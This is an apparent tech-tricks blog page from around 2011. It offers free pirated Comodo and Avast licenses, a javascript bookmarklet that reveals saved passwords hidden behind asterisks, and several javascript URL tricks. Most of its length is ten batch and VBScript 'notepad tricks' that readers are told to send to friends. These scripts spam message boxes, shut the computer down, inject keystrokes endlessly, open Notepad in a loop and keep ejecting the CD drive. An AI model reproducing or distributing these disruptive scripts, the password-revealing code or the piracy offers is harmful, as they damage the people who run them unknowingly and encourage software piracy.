mRockstar–An Upcoming Social Network Site

mRockstar.com, it’s social networking website plus a music based community. The pre-phase of the website was launched on April 5, 2011 to let people reserve their mRockstar Usernames

Comodo Internet Security 2011 Pro 1 Year License Key

If you buy this product from the Official Webpage, it will cost you more than $49 per year. But now you’ve got a chance to get it for absolutely free. You don’t need any license key for this package because it has already been integrated with the package. Just download it and you’ve a fully featured Internet security system which will protect your PC from Viruses, Trojans, Malwares, Hackers and every type of threat that can harm your computer. Grab this offer

Download Avast 6 Home Edition 1 Year License Key

Avast antivirus is one of the top leading antivirus and it is available for free download.You will get a fully functional 30 day trial version of avast if you download directly from their website.To activate it for one year you need to register with them.Once registered you will get your Serial license key into your mailbox.

Make Your Computer Speak Whatever You Type


Now you can convert your computer in to a text to voice software. You can make your computer speak whatever you type. For this you don’t require any programming knowledge, You can achieve this by a simple trick. Just follow the steps given below to make your computer speak whatever you type :
Step 1 : Open a notepad and cope and paste the code given below.
Dim message, sapi
message=InputBox(“Type the text which you want me to speak”,”Text To Voice Software”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message
Step 2 : Save The notepad file as speak.vbs (you can save it with any name but extension should be .vbs).
Step 3 : Now double click on the file and type in the box whatever you want the computer to speak and click ok.

View Passwords Behind Asterisk

Today I am going to tell you a really cool trick which you can perform using Javascript. This trick will allow you to view passwords behind Asterisk.You can use this trick on any web page which contains password hidden behind Asterisk.

What is Javascript ?
According to Wikipedia :
JavaScript is an implementation of the ECMAScript language standard and is typically used to enable programmatic access to computational objects within a host environment. JavaScript is primarily used in the form of client-side JavaScript, implemented as part of a web browser in order to provide enhanced user interfaces and dynamic websites. However, its use in applications outside web pages is also significant.
View Passwords Behind Asterix !!
To view saved passwords behind asterisk, just open the web page having the password. After opening the web page paste the javascript given below in the address bar and hit enter. That’s it.
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
Just after hitting enter the password which was there in the password field will appear in a alert box.

5 Great Javascript Tricks

JavaScript, also known as ECMAScript is a prototype-based object-oriented scripting language that is dynamic, weakly typed and has first-class functions. It is also considered a functional programming language like Scheme and OCaml because it has closures and supports higher-order functions. JavaScript is an implementation of the ECMAScript language standard and is primarily used in the form of client-side JavaScript, implemented as part of a web browser in order to provide enhanced user interfaces and dynamic websites. This enables programmatic access to computational objects within a host environment.
1. Play Game :
Now you can play game on any web page, just copy and paste the javascript code given below in the url bar and hit enter. As soon as you hit enter you can observe an triangle shape object in the upper left corner of the window. Navigate it with the help of W, A and D keys and fire using Spacebar.
javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://erkie.github.com/asteroids.min.js';void(0);
2. Edit Web Page :
You easily edit any web page using this javascript. But when you refresh the page changes are lost.
javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0
3. Infinite Alert Boxes :
As soon as you run this javascript a infinite loop of alert boxes will open which cannot be stopped until you restart your web browser. In case of Google Chrome web browser, the browser it self has the capability to stop loop of alert boxes.
javascript:while(1){alert('Restart your brower to close this box!')}
4. Calculator :
You can also use javascript for calculation purposes. Just type the mathematical expression in the brackets and paste the javascript code in the url bar and hit enter.
javascript: alert(4+5+6+7+(3*10));
5.View Passwords Behind Asterisk :
To View passwords behind asterisk visit View Passwords Behind Asterisk.


10 Great NotePad Tricks To Scare Your Friends

Most of you must be aware about a tool called notepad. It is a simple text based editor. But today I am going to discuss some cool tricks which you can perform on your computer using notepad. You can also use these tricks to scare your friends.

Cycle a message in your friend’s computer.
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as pc.bat and send it to your friends.
Make Keyboard Keys Type Continuously:
Type :
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as pc.vbs and send it to your friends.
Convey your friend a message and shut down his/ her computer.
Type :
@echo off
msg * I don’t like you
shutdown -c “Hahahah You are Doomed” -s
Save it as pc.bat and send it to your friends.
Toggle your friend’s Caps Lock button simultaneously
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as pc.vbs and send it to your friends.
Frustrate your friend by making their keyboard hit Enter simultaneously whenever they press a key :
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as pc.vbs and send it to your friends.
Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as pc.vbs and send it to your friends.
Open Notepad, slowly type anythingand freak your friends out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Save it as pc.vbs and send it to your friends.
Frustrate your friend by making their keyboard hit Backspace simultaneously whenever they press a key :
Type :
MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as pc.vbs and send it to your friends.
Open Notepad continuously in your friend’s computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as pc.bat and send it.
Continuously pop out your friend’s CD or DVD Drive.
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as pc.vbs and send it to your friends.